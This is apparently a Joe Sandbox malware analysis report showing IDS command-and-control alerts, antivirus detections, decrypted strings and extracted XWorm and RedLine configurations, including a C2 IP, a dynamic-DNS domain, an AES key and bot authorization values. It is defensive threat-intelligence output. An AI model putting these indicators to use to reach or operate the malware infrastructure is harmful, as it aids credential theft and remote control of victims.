                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-08T15:09:23.261690+010020432311A Network Trojan was detected192.168.2.74997578.70.235.2381912TCP
                            2024-12-08T15:09:28.741564+010020432311A Network Trojan was detected192.168.2.74997578.70.235.2381912TCP
                            2024-12-08T15:09:32.363456+010020432311A Network Trojan was detected192.168.2.74997578.70.235.2381912TCP
                            2024-12-08T15:09:32.830923+010020432311A Network Trojan was detected192.168.2.74997578.70.235.2381912TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-08T15:09:29.351833+010020460561A Network Trojan was detected78.70.235.2381912192.168.2.749975TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-08T15:09:23.261690+010020460451A Network Trojan was detected192.168.2.74997578.70.235.2381912TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-08T15:08:13.744131+010028536851A Network Trojan was detected192.168.2.749830149.154.167.220443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-08T15:08:19.169034+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:08:27.758355+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:08:29.172585+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:08:33.201795+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:08:34.169771+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:08:39.168554+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:08:40.652199+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:08:44.169826+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:08:49.179394+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:08:53.738977+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:08:54.168331+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:08:59.264515+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:09:03.202268+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:09:04.175376+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:09:06.777262+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:09:09.183205+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:09:14.202103+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:09:19.225320+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:09:19.960688+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:09:24.234614+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:09:29.243495+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:09:32.872415+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:09:33.200149+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:09:33.392117+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:09:34.254947+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:09:39.269114+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:09:44.263695+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:09:44.482617+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:09:49.275442+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:09:51.356356+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:09:54.284307+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:09:57.512458+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:09:59.338792+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:10:01.453437+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:10:02.982048+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:10:03.231685+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:10:04.304027+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:10:09.292820+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:10:10.824207+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:10:11.598830+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:10:14.407336+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:10:19.299922+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:10:29.291834+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:10:33.250882+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:10:34.289266+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:10:37.156355+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:10:39.306302+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:10:44.334483+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:10:49.638357+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:10:50.343627+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:10:54.322857+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:10:56.246610+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:10:59.342002+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:11:01.450287+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:11:03.249490+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:11:04.351419+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:11:07.147793+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:11:07.340025+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:11:07.531901+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:11:09.342076+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:11:14.358124+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:11:19.374627+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:11:24.414182+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:11:29.394596+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:11:33.247910+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:11:34.399150+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:11:39.416026+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:11:44.439871+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:11:49.925111+010028528701Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-08T15:08:27.765691+010028529231Malware Command and Control Activity Detected192.168.2.74983778.70.235.2387000TCP
                            2024-12-08T15:08:40.656781+010028529231Malware Command and Control Activity Detected192.168.2.74983778.70.235.2387000TCP
                            2024-12-08T15:08:53.829799+010028529231Malware Command and Control Activity Detected192.168.2.74983778.70.235.2387000TCP
                            2024-12-08T15:09:06.778789+010028529231Malware Command and Control Activity Detected192.168.2.74983778.70.235.2387000TCP
                            2024-12-08T15:09:19.962388+010028529231Malware Command and Control Activity Detected192.168.2.74983778.70.235.2387000TCP
                            2024-12-08T15:09:32.918546+010028529231Malware Command and Control Activity Detected192.168.2.74983778.70.235.2387000TCP
                            2024-12-08T15:09:33.204532+010028529231Malware Command and Control Activity Detected192.168.2.74983778.70.235.2387000TCP
                            2024-12-08T15:09:44.513231+010028529231Malware Command and Control Activity Detected192.168.2.74983778.70.235.2387000TCP
                            2024-12-08T15:09:48.659084+010028529231Malware Command and Control Activity Detected192.168.2.74997678.70.235.2387000TCP
                            2024-12-08T15:09:48.781337+010028529231Malware Command and Control Activity Detected192.168.2.74997678.70.235.2387000TCP
                            2024-12-08T15:09:48.931838+010028529231Malware Command and Control Activity Detected192.168.2.74997678.70.235.2387000TCP
                            2024-12-08T15:09:49.051515+010028529231Malware Command and Control Activity Detected192.168.2.74997678.70.235.2387000TCP
                            2024-12-08T15:09:49.175077+010028529231Malware Command and Control Activity Detected192.168.2.74997678.70.235.2387000TCP
                            2024-12-08T15:09:49.297083+010028529231Malware Command and Control Activity Detected192.168.2.74997678.70.235.2387000TCP
                            2024-12-08T15:09:49.422887+010028529231Malware Command and Control Activity Detected192.168.2.74997678.70.235.2387000TCP
                            2024-12-08T15:09:49.556373+010028529231Malware Command and Control Activity Detected192.168.2.74997678.70.235.2387000TCP
                            2024-12-08T15:09:49.687489+010028529231Malware Command and Control Activity Detected192.168.2.74997678.70.235.2387000TCP
                            2024-12-08T15:09:49.812838+010028529231Malware Command and Control Activity Detected192.168.2.74997678.70.235.2387000TCP
                            2024-12-08T15:09:49.954401+010028529231Malware Command and Control Activity Detected192.168.2.74997678.70.235.2387000TCP
                            2024-12-08T15:09:50.125521+010028529231Malware Command and Control Activity Detected192.168.2.74997678.70.235.2387000TCP
                            2024-12-08T15:09:50.250044+010028529231Malware Command and Control Activity Detected192.168.2.74997678.70.235.2387000TCP
                            2024-12-08T15:09:51.361211+010028529231Malware Command and Control Activity Detected192.168.2.74983778.70.235.2387000TCP
                            2024-12-08T15:09:57.519867+010028529231Malware Command and Control Activity Detected192.168.2.74983778.70.235.2387000TCP
                            2024-12-08T15:10:01.455407+010028529231Malware Command and Control Activity Detected192.168.2.74983778.70.235.2387000TCP
                            2024-12-08T15:10:02.983572+010028529231Malware Command and Control Activity Detected192.168.2.74983778.70.235.2387000TCP
                            2024-12-08T15:10:10.831218+010028529231Malware Command and Control Activity Detected192.168.2.74983778.70.235.2387000TCP
                            2024-12-08T15:10:11.605188+010028529231Malware Command and Control Activity Detected192.168.2.74983778.70.235.2387000TCP
                            2024-12-08T15:10:37.183249+010028529231Malware Command and Control Activity Detected192.168.2.74983778.70.235.2387000TCP
                            2024-12-08T15:10:50.357024+010028529231Malware Command and Control Activity Detected192.168.2.74983778.70.235.2387000TCP
                            2024-12-08T15:10:56.254885+010028529231Malware Command and Control Activity Detected192.168.2.74983778.70.235.2387000TCP
                            2024-12-08T15:11:01.459302+010028529231Malware Command and Control Activity Detected192.168.2.74983778.70.235.2387000TCP
                            2024-12-08T15:11:07.239367+010028529231Malware Command and Control Activity Detected192.168.2.74983778.70.235.2387000TCP
                            2024-12-08T15:11:07.358720+010028529231Malware Command and Control Activity Detected192.168.2.74983778.70.235.2387000TCP
                            2024-12-08T15:11:07.542279+010028529231Malware Command and Control Activity Detected192.168.2.74983778.70.235.2387000TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-08T15:08:33.201795+010028528741Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:09:03.202268+010028528741Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:09:33.392117+010028528741Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:10:03.231685+010028528741Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:10:33.250882+010028528741Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:11:03.249490+010028528741Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            2024-12-08T15:11:33.247910+010028528741Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-08T15:09:48.659084+010028528731Malware Command and Control Activity Detected192.168.2.74997678.70.235.2387000TCP
                            2024-12-08T15:09:48.781337+010028528731Malware Command and Control Activity Detected192.168.2.74997678.70.235.2387000TCP
                            2024-12-08T15:09:48.931838+010028528731Malware Command and Control Activity Detected192.168.2.74997678.70.235.2387000TCP
                            2024-12-08T15:09:49.051515+010028528731Malware Command and Control Activity Detected192.168.2.74997678.70.235.2387000TCP
                            2024-12-08T15:09:49.175077+010028528731Malware Command and Control Activity Detected192.168.2.74997678.70.235.2387000TCP
                            2024-12-08T15:09:49.297083+010028528731Malware Command and Control Activity Detected192.168.2.74997678.70.235.2387000TCP
                            2024-12-08T15:09:49.422887+010028528731Malware Command and Control Activity Detected192.168.2.74997678.70.235.2387000TCP
                            2024-12-08T15:09:49.556373+010028528731Malware Command and Control Activity Detected192.168.2.74997678.70.235.2387000TCP
                            2024-12-08T15:09:49.687489+010028528731Malware Command and Control Activity Detected192.168.2.74997678.70.235.2387000TCP
                            2024-12-08T15:09:49.812838+010028528731Malware Command and Control Activity Detected192.168.2.74997678.70.235.2387000TCP
                            2024-12-08T15:09:49.954401+010028528731Malware Command and Control Activity Detected192.168.2.74997678.70.235.2387000TCP
                            2024-12-08T15:09:50.125521+010028528731Malware Command and Control Activity Detected192.168.2.74997678.70.235.2387000TCP
                            2024-12-08T15:09:50.250044+010028528731Malware Command and Control Activity Detected192.168.2.74997678.70.235.2387000TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-08T15:08:27.204761+010028559241Malware Command and Control Activity Detected192.168.2.74983778.70.235.2387000TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-08T15:08:28.345620+010028531911Malware Command and Control Activity Detected78.70.235.2387000192.168.2.749837TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-08T15:08:51.231113+010028531921Malware Command and Control Activity Detected192.168.2.74983778.70.235.2387000TCP

                            Joe Sandbox Signatures

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Antivirus / Scanner detection for submitted sample
                            Source: spoolsv.exeAvira: detected
                            Found malware configuration
                            Source: spoolsv.exeMalware Configuration Extractor: Xworm {"C2 url": ["78.70.235.238", "f8terat.ddns.net"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "smss.exe", "Version": "XWorm V5.6"}
                            Source: 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: RedLine {"C2 url": ["78.70.235.238:1912"], "Bot Id": "l3monlogs", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}
                            Multi AV Scanner detection for submitted file
                            Source: spoolsv.exeReversingLabs: Detection: 87%
                            AI detected suspicious sample
                            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                            Machine Learning detection for sample
                            Source: spoolsv.exeJoe Sandbox ML: detected
                            Sample uses string decryption to hide its real strings
                            Source: spoolsv.exeString decryptor: 78.70.235.238,f8terat.ddns.net
                            Source: spoolsv.exeString decryptor: 7000
                            Source: spoolsv.exeString decryptor: <123456789>
                            Source: spoolsv.exeString decryptor: <Xwormmm>
                            Source: spoolsv.exeString decryptor: HawkEye V1.0
                            Source: spoolsv.exeString decryptor: smss.exe
                            Source: spoolsv.exeString decryptor: %Temp%
                            Source: spoolsv.exeString decryptor: spoolsv.exe
                            Source: spoolsv.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49830 version: TLS 1.2
                            Source: spoolsv.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000002F24000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: attzwu.exe, 0000001B.00000002.2707260922.00000000016FD000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: rC:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000004324000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000002F24000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000002F24000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000002F24000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000004324000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000002F24000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: qC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000002F24000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000002F24000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000004324000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: pC:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000004324000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000004D4C000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000002F24000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000004324000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000004324000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: zC:\Users\user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000004D4C000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000002F24000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000004324000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: lC:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000004324000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000004324000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000002F24000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000004324000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000002F24000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000004324000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000004324000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: jC:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000004324000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000004324000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000003924000.00000004.00000800.00020000.00000000.sdmp
